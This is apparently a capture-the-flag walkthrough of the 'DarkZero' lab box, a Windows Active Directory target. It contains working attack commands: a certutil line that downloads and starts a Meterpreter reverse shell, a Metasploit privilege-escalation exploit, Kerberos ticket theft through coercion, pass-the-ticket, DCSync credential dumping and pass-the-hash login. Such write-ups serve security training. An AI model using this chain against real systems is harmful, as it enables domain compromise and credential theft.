Credentials
As is common in real life pentests, you will start the DarkZero box with credentials for the following account
john.w:RFulUtONCOL!
Enum
$ export IP=10.129.148.173
$ rustscan --ulimit 10000 -a $IP -- -sCTV -Pn
[~] Automatically increasing ulimit value to 10000.
Open 10.129.148.173:139
Open 10.129.148.173:135
Open 10.129.148.173:88
Open 10.129.148.173:53
Open 10.129.148.173:464
Open 10.129.148.173:445
Open 10.129.148.173:389
Open 10.129.148.173:636
Open 10.129.148.173:593
Open 10.129.148.173:1433
Open 10.129.148.173:2179
Open 10.129.148.173:5985
Open 10.129.148.173:9389
Open 10.129.148.173:49664
Open 10.129.148.173:49667
Open 10.129.148.173:49670
Open 10.129.148.173:49671
Open 10.129.148.173:49891
Open 10.129.148.173:49911
Open 10.129.148.173:52038
Open 10.129.148.173:62939
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-10-05 21:08:34Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Issuer: commonName=darkzero-DC01-CA/domainComponent=darkzero
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-07-29T11:40:00
| Not valid after: 2026-07-29T11:40:00
| MD5: ce57:1ac8:da76:eb62:efe8:4e85:045b:d440
| SHA-1: 603a:f638:aabb:7eaa:1bdb:4256:5869:4de2:98b6:570c
| -----BEGIN CERTIFICATE-----
|_-----END CERTIFICATE-----
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Issuer: commonName=darkzero-DC01-CA/domainComponent=darkzero
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-07-29T11:40:00
| Not valid after: 2026-07-29T11:40:00
| MD5: ce57:1ac8:da76:eb62:efe8:4e85:045b:d440
| SHA-1: 603a:f638:aabb:7eaa:1bdb:4256:5869:4de2:98b6:570c
| -----BEGIN CERTIFICATE-----
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
1433/tcp open ms-sql-s syn-ack Microsoft SQL Server 2022 16.00.1000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-05T20:51:31
| Not valid after: 2055-10-05T20:51:31
| MD5: d5fe:099b:2073:bc9e:3616:61b2:9f97:0499
| SHA-1: 565c:01d3:971a:d70a:1c15:8da2:1ab8:7c37:c272:6838
| -----BEGIN CERTIFICATE-----
|_-----END CERTIFICATE-----
| ms-sql-ntlm-info:
| 10.129.148.173:1433:
| Target_Name: darkzero
| NetBIOS_Domain_Name: darkzero
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: darkzero.htb
| DNS_Computer_Name: DC01.darkzero.htb
| DNS_Tree_Name: darkzero.htb
|_ Product_Version: 10.0.26100
|_ssl-date: 2025-10-05T21:10:06+00:00; +7h00m00s from scanner time.
| ms-sql-info:
| 10.129.148.173:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
2179/tcp open vmrdp? syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49670/tcp open msrpc syn-ack Microsoft Windows RPC
49671/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49891/tcp open msrpc syn-ack Microsoft Windows RPC
49911/tcp open msrpc syn-ack Microsoft Windows RPC
52038/tcp open msrpc syn-ack Microsoft Windows RPC
62939/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 28213/tcp): CLEAN (Timeout)
| Check 2 (port 39889/tcp): CLEAN (Timeout)
| Check 3 (port 12197/udp): CLEAN (Timeout)
| Check 4 (port 51917/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s- Update
/etc/hosts - Fix time skew
$ echo "$IP darkzero.htb DC01.darkzero.htb" | sudo tee -a /etc/hosts
10.129.148.173 darkzero.htb DC01.darkzero.htb
$ sudo ntpdate $IPLDAPenumeration revealsdc02.darkzero.ext
$ nxc ldap $IP -u john.w -p 'RFulUtONCOL!' --dc-list
LDAP 10.129.148.173 389 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb) (signing:Enforced) (channel binding:When Supported)
LDAP 10.129.148.173 389 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
LDAP 10.129.148.173 389 DC01 DC01.darkzero.htb = 172.16.20.1
LDAP 10.129.148.173 389 DC01 [+] Found DC in trusted domain: dc02.darkzero.ext
LDAP 10.129.148.173 389 DC01 darkzero.ext -> Bidirectional -> Forest Transitive, Cross Organization Enable TGT Delegation
LDAP 10.129.148.173 389 DC01 dc02.darkzero.ext = 172.16.20.2
$ echo "$IP dc02.darkzero.ext" | sudo tee -a /etc/hostsmssqlis running on port 1433 so let’s try credentials we were givennxc mssqlmodules offer some convenient commands
$ nxc mssql -L
LOW PRIVILEGE MODULES
[*] enable_cmdshell Enable or disable xp_cmdshell in MSSQL Server
[*] enum_impersonate Enumerate users with impersonation privileges
[*] enum_links Enumerate linked SQL Servers and their login configurations.
[*] enum_logins Enumerate SQL Server logins (SQL, Domain, Local users)
[*] exec_on_link Execute commands on a SQL Server linked server
[*] link_enable_cmdshell Enable or disable xp_cmdshell on a linked MSSQL server
[*] link_xpcmd Run xp_cmdshell commands on a linked SQL server
[*] mssql_coerce Execute arbitrary SQL commands on the target MSSQL server
[*] mssql_priv Enumerate and exploit MSSQL privileges
HIGH PRIVILEGE MODULES (requires admin privs)
[*] empire_exec Uses Empire`s RESTful API to generate a launcher for the specified listener and executes it
[*] met_inject Downloads the Meterpreter stager and injects it into memory
[*] nanodump Get lsass dump using nanodump and parse the result with pypykatz
[*] test_connection Pings a host
[*] web_delivery Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module
$ nxc mssql $IP -u john.w -p 'RFulUtONCOL!'
MSSQL 10.129.148.173 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.148.173 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!- Credentials confirmed so lets enumerate some more about the configuration
$ nxc mssql $IP -u john.w -p 'RFulUtONCOL!' -M enum_logins
MSSQL 10.129.148.173 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.148.173 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
ENUM_LOGINS 10.129.148.173 1433 DC01 [*] Enumerated logins
ENUM_LOGINS 10.129.148.173 1433 DC01 Login Name Type Status
ENUM_LOGINS 10.129.148.173 1433 DC01 ---------- ---- ------
ENUM_LOGINS 10.129.148.173 1433 DC01 darkzero\john.w Domain User ENABLED
ENUM_LOGINS 10.129.148.173 1433 DC01 sa SQL User DISABLED
ENUM_LOGINS 10.129.148.173 1433 DC01 darkzero\Domain Users Windows Group ENABLED
$ nxc mssql $IP -u john.w -p 'RFulUtONCOL!' -M enum_links
MSSQL 10.129.148.173 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.148.173 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
ENUM_LINKS 10.129.148.173 1433 DC01 [+] Linked servers found:
ENUM_LINKS 10.129.148.173 1433 DC01 [*] - DC01
ENUM_LINKS 10.129.148.173 1433 DC01 [*] - DC02.darkzero.ext- Once again we see cross linking with
DC02.darkzero.ext - Testing DC01 we cannot enable xp_cmdshell
- We can attempt to use
DC02.darkzero.extinstead and actually get results returned back
$ nxc mssql -M link_enable_cmdshell --options
Defines the options for enabling or disabling xp_cmdshell on the linked server.
ACTION Specifies whether to enable or disable:
- enable (default)
- disable
LINKED_SERVER The name of the linked SQL server to target.
$ nxc mssql $IP -u john.w -p 'RFulUtONCOL!' -M link_enable_cmdshell -o LINKED_SERVER=DC02.darkzero.ext ACTION=enable
MSSQL 10.129.148.173 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.148.173 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
LINK_ENA... 10.129.148.173 1433 DC01 [*] Enabling xp_cmdshell on DC02.darkzero.ext. Current value: False
LINK_ENA... 10.129.148.173 1433 DC01 [+] xp_cmdshell enabled on DC02.darkzero.ext
$ nxc mssql -M link_xpcmd --options
Defines the options for running xp_cmdshell commands on a linked server.
LINKED_SERVER The name of the linked SQL server to target.
CMD The command to run via xp_cmdshell.
$ nxc mssql $IP -u john.w -p 'RFulUtONCOL!' -M link_xpcmd -o LINKED_SERVER=DC02.darkzero.ext CMD="whoami"
MSSQL 10.129.148.173 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.148.173 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
LINK_XPCMD 10.129.148.173 1433 DC01 [*] Running command on DC02.darkzero.ext: whoami
LINK_XPCMD 10.129.148.173 1433 DC01 [+] Executed command via linked server
LINK_XPCMD 10.129.148.173 1433 DC01 darkzero-ext\svc_sqlUser (Intended)
Placeholder
Will update after I can run through again
User (Unintended)
- Now that we have enabled
xp_cmdshellwe will attempt to start ameterpretersession - Use https://www.revshells.com/ to generate
msfvenomandmsfconsolecommands - We will also start an HTTP server via python to transfer our file to the server
- Make sure to update your IP & PORT in all cases
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=6969 -f exe -o shell.exe
$ msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.10.10; set lport 6969; exploit"
$ python3 -m http.server 7070- Now in separate terminal we will download and trigger our revshell payload via
nxca final time as well as have ourmsfconsolelistener ready
$ nxc mssql $IP -u john.w -p 'RFulUtONCOL!' -M link_xpcmd -o LINKED_SERVER=DC02.darkzero.ext CMD="certutil -urlcache -f http://10.10.10.10:7070/shell.exe %TEMP%/shell.exe && start %TEMP%/shell.exe"- Catch session in
msfconsole - Background session
- Configure and run exploit suggester
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf exploit(multi/handler) > set SESSION 1
msf exploit(multi/handler) > set validatearch false
msf exploit(multi/handler) > run
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/appxsvc_hard_link_privesc Yes The service is running, but could not be validated.
2 exploit/windows/local/bypassuac_dotnet_profiler Yes The target appears to be vulnerable.
3 exploit/windows/local/bypassuac_sdclt Yes The target appears to be vulnerable.
4 exploit/windows/local/cve_2022_21882_win32k Yes The service is running, but could not be validated. May be vulnerable, but exploit not tested on Windows Server 2022
5 exploit/windows/local/cve_2022_21999_spoolfool_privesc Yes The target appears to be vulnerable.
6 exploit/windows/local/cve_2023_28252_clfs_driver Yes The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
7 exploit/windows/local/cve_2024_30085_cloud_files Yes The target appears to be vulnerable.
8 exploit/windows/local/cve_2024_30088_authz_basep Yes The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
9 exploit/windows/local/cve_2024_35250_ks_driver Yes The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022
10 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
11 exploit/windows/local/registry_persistence Yes The target is vulnerable.- Only #8 did the trick
msf post(multi/recon/local_exploit_suggester) > use exploit/windows/local/cve_2024_30088_authz_basep
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/cve_2024_30088_authz_basep) > options
Module options (exploit/windows/local/cve_2024_30088_authz_basep):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.50.251 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x64
View the full module info with the info, or info -d command.
msf exploit(windows/local/cve_2024_30088_authz_basep) > set SESSION 1
SESSION => 1
msf exploit(windows/local/cve_2024_30088_authz_basep) > set LHOST tun0
LHOST => 10.10.15.40
msf exploit(windows/local/cve_2024_30088_authz_basep) > set LPORT 9696
LPORT => 9696
msf exploit(windows/local/cve_2024_30088_authz_basep) > run
[*] Started reverse TCP handler on 10.10.10.10:9696
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
[*] Reflectively injecting the DLL into 1936...
[+] The exploit was successful, reading SYSTEM token from memory...
[+] Successfully stole winlogon handle: 992
[+] Successfully retrieved winlogon pid: 612
[*] Sending stage (203846 bytes) to 10.129.148.173
[*] Meterpreter session 2 opened (10.10.10.10:9696 -> 10.129.148.173:54531)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > dir "C:\Users\Administrator\Desktop"
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2025-07-29 08:58:25 -0400 desktop.ini
100666/rw-rw-rw- 34 fil 2025-10-04 00:00:00 -0400 user.txt
meterpreter > cat "C:\Users\Administrator\Desktop\user.txt"Root
- Since we have observed several mentions of
DC01andDC02being linked together let’s check for unconstrained delegation
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > Get-ADComputer -Filter {TrustedForDelegation -eq $true}
DistinguishedName : CN=DC02,OU=Domain Controllers,DC=darkzero,DC=ext
DNSHostName : DC02.darkzero.ext
Enabled : True
Name : DC02
ObjectClass : computer
ObjectGUID : f85520d0-db6e-4a92-9ebc-f01d6d4cc268
SamAccountName : DC02$
SID : S-1-5-21-1969715525-31638512-2552845157-1000
UserPrincipalName :- Seems we can carry out the attack to steal
DC01TGT when it authenticates withDC02 - Need to use Rubeus with some sort of coercion tactic, I will use aptly named Coercer
Rubeuslistens for TGT authentication, andcoercerwill prompt the authentication process
C:\Users\Administrator\Desktop> Rubeus.exe monitor /interval:5
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: TGT Monitoring
[*] Monitoring every 5 seconds for new TGTs
*snip*- Now we need to trigger some sort of coercion
$ coercer coerce -u john.w -p RFulUtONCOL! -d darkzero.htb -l DC02.darkzero.ext -t DC01.darkzero.htb
______
/ ____/___ ___ _____________ _____
/ / / __ \/ _ \/ ___/ ___/ _ \/ ___/
/ /___/ /_/ / __/ / / /__/ __/ / v2.4.3
\____/\____/\___/_/ \___/\___/_/ by @podalirius_
[info] Starting coerce mode
[info] Scanning target DC01.darkzero.htb
[*] DCERPC portmapper discovered ports: 49664,49665,49666,49667,49891,49669,49670,52038,49876,49911,62939
[+] SMB named pipe '\PIPE\efsrpc' is accessible!
[+] Successful bind to interface (df1941c5-fe89-4e79-bf10-463657acf44d, 1.0)!
[+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\DC02.darkzero.ext\6UX0Xlfo\file.txt\x00')
Continue (C) | Skip this function (S) | Stop exploitation (X) ? X
[+] All done! Bye Bye!- We will see a new ticket in Rubeus for
DC01
User : DC01$@DARKZERO.HTB
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDYT2hllhY2nKW7Tagbq2GFEUrofcHITWZfVcqzIW2ZwiYY4sfQg0f+B4BPR+c+QMdR0YjsZz5k279wuTY0CSSezPDgCbVeUDC8ZS4cuXXY62Z1BW3ENpNBv4MDZCwYD3DSeH47GoiieZNhdU3ayfOwJGjLpQSV1FuC7pG36UofUVLP4OycRMlDh+O8s4/z3UXm5fR+2r+F6llO7Ly/tzBfc3EOM3cpGYXygRT2+hKZCoWhh6FbAL5JgF7XXWOj1pNUGs2E3/M+pzRgIs8voy35vf6k3s/do57ASUCN5DyezpLyJh0bl6OWiXs1WY1GUwp8EvVeRcrCVFTLuSWkHfUapWmaoDFz6/hclYtbJ02Iqm8G6y+EJA42EisOSVgJZ3bVI7sG1nd4KxPZ3HuX1LAV9UpUt4/0Hn+23hitYdLpz1hyD4A5lkwec6fAoNk0fnFmAmMS0dr+gU3L7udiF26dqse/ZWz+sfSx7jP7L26/2vWK54PSYQBf3u+cR3CCnBjPGKZX8ForjatdJ8PZp23ggfRw4l0h0ifPiBeW9h/4ZhC8zGoFEOD81lr2eprkBpw3J/O+LiEI4ziD9/rQFoIHam4vmYdOAPjLQaKxPtuR1wNhlcc5mZcYI6VpnZ7hx7RXYmCeWdx0j0LcZNTHGCQiAxqQGHYx2K+H+O0iWXP2HzVzPqg07C15LCYIoKSBTTT06IXRDUJj6EVukLuBmeBkqsZcR2CVfUK80k2Xddzw7sTTDp1XODTS+/k1uhW8ZrWTXtkxd+/Sk2UA09FTRbzh0OdlfBzWnenQ37Mhun0plQUJhuNOtXVw45Xnxctlr1HQt+geG9c2DKsXX62rVjG8zQ1Zq0YeOhYid14rUx2tFJ7YQc516/JC0AwMIwMtgU6upvkPhcwvTxXyZSXmc00GsirtpfDnanVxBYwXvwVh7VNFKRj8z85t51xncFMl7+yvjWdti5vvAdUvxfXOi0Ltcsy2lUYCyg6EmIcVMIEvkRe0hIpmC6FcTkN87LDbYiRLHn4TmQWIhjVXltmASZMAi3Kttf2H+iVNCtGeN+V0Q8TTUzBb2ymL6GVya5zI7cXWiQxAnzjTZ/izAUhUlW7gcbWEWAc1Lj4BTH8GFXDII+xrOXlXr4JbnvNEenVKjK/Zjhto3P9lf0T2Rod7jbsIhhyk2ZaRqfj6pSJLw2xqNsgI/z4xWCu5sN+Wrp5pLOKE2jf6bI+ylSAqgSljWezotIast8OpsVJpgUCe02QMsEFaG3hYn7BxG4/88CBKa6fQMRFFBOT//WjwCaFbdvkv+Vv6OcVWsHvdszS/N2hvMCVC2IQWbEMAh2YRtUt/ZpQTXFuOWbaglCoKX3LirV/vbULvAELgov3lW+dhHpIBmZ3NrN7yGK8kW/e9I2eIDrcjP3mN6ByOSlQXW950Thyuxo9oAvE99o4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQgozBiQ6SA6pdJ7dH0lAoN9WvzhlHXvK21X9k4ef35bP6hDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTEwMDYwNjIwMjVaphEYDzIwMjUxMDA2MTYyMDI1WqcRGA8yMDI1MTAxMjIwNDk1MlqoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI=- We need to now Pass The Ticket (PTT)
C:\Users\Administrator\Desktop> Rubeus.exe ptt /ticket:doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDYT2hllhY2nKW7Tagbq2GFEUrofcHITWZfVcqzIW2ZwiYY4sfQg0f+B4BPR+c+QMdR0YjsZz5k279wuTY0CSSezPDgCbVeUDC8ZS4cuXXY62Z1BW3ENpNBv4MDZCwYD3DSeH47GoiieZNhdU3ayfOwJGjLpQSV1FuC7pG36UofUVLP4OycRMlDh+O8s4/z3UXm5fR+2r+F6llO7Ly/tzBfc3EOM3cpGYXygRT2+hKZCoWhh6FbAL5JgF7XXWOj1pNUGs2E3/M+pzRgIs8voy35vf6k3s/do57ASUCN5DyezpLyJh0bl6OWiXs1WY1GUwp8EvVeRcrCVFTLuSWkHfUapWmaoDFz6/hclYtbJ02Iqm8G6y+EJA42EisOSVgJZ3bVI7sG1nd4KxPZ3HuX1LAV9UpUt4/0Hn+23hitYdLpz1hyD4A5lkwec6fAoNk0fnFmAmMS0dr+gU3L7udiF26dqse/ZWz+sfSx7jP7L26/2vWK54PSYQBf3u+cR3CCnBjPGKZX8ForjatdJ8PZp23ggfRw4l0h0ifPiBeW9h/4ZhC8zGoFEOD81lr2eprkBpw3J/O+LiEI4ziD9/rQFoIHam4vmYdOAPjLQaKxPtuR1wNhlcc5mZcYI6VpnZ7hx7RXYmCeWdx0j0LcZNTHGCQiAxqQGHYx2K+H+O0iWXP2HzVzPqg07C15LCYIoKSBTTT06IXRDUJj6EVukLuBmeBkqsZcR2CVfUK80k2Xddzw7sTTDp1XODTS+/k1uhW8ZrWTXtkxd+/Sk2UA09FTRbzh0OdlfBzWnenQ37Mhun0plQUJhuNOtXVw45Xnxctlr1HQt+geG9c2DKsXX62rVjG8zQ1Zq0YeOhYid14rUx2tFJ7YQc516/JC0AwMIwMtgU6upvkPhcwvTxXyZSXmc00GsirtpfDnanVxBYwXvwVh7VNFKRj8z85t51xncFMl7+yvjWdti5vvAdUvxfXOi0Ltcsy2lUYCyg6EmIcVMIEvkRe0hIpmC6FcTkN87LDbYiRLHn4TmQWIhjVXltmASZMAi3Kttf2H+iVNCtGeN+V0Q8TTUzBb2ymL6GVya5zI7cXWiQxAnzjTZ/izAUhUlW7gcbWEWAc1Lj4BTH8GFXDII+xrOXlXr4JbnvNEenVKjK/Zjhto3P9lf0T2Rod7jbsIhhyk2ZaRqfj6pSJLw2xqNsgI/z4xWCu5sN+Wrp5pLOKE2jf6bI+ylSAqgSljWezotIast8OpsVJpgUCe02QMsEFaG3hYn7BxG4/88CBKa6fQMRFFBOT//WjwCaFbdvkv+Vv6OcVWsHvdszS/N2hvMCVC2IQWbEMAh2YRtUt/ZpQTXFuOWbaglCoKX3LirV/vbULvAELgov3lW+dhHpIBmZ3NrN7yGK8kW/e9I2eIDrcjP3mN6ByOSlQXW950Thyuxo9oAvE99o4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQgozBiQ6SA6pdJ7dH0lAoN9WvzhlHXvK21X9k4ef35bP6hDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTEwMDYwNjIwMjVaphEYDzIwMjUxMDA2MTYyMDI1WqcRGA8yMDI1MTAxMjIwNDk1MlqoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI=
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Import Ticket
[+] Ticket successfully imported!- Now we can DCSync for admin hash via
kiwiormimikatz
meterpreter > kiwi_cmd "lsadump::dcsync /domain:darkzero.htb /user:Administrator"
[DC] 'darkzero.htb' will be the domain
[DC] 'DC01.darkzero.htb' will be the DC server
[DC] 'Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 9/10/2025 9:42:44 AM
Object Security ID : S-1-5-21-1152179935-589108180-1989892463-500
Object Relative ID : 500
Credentials:
Hash NTLM: 5917507bdf2ef2c2b0a869a1cba40726
*snip*- Connect via
evil-winrm
$ evil-winrm -i $IP -u administrator -H '5917507bdf2ef2c2b0a869a1cba40726'
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir ../Desktop
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/4/2025 1:50 PM 34 root.txt
-ar--- 10/4/2025 1:50 PM 34 user.txt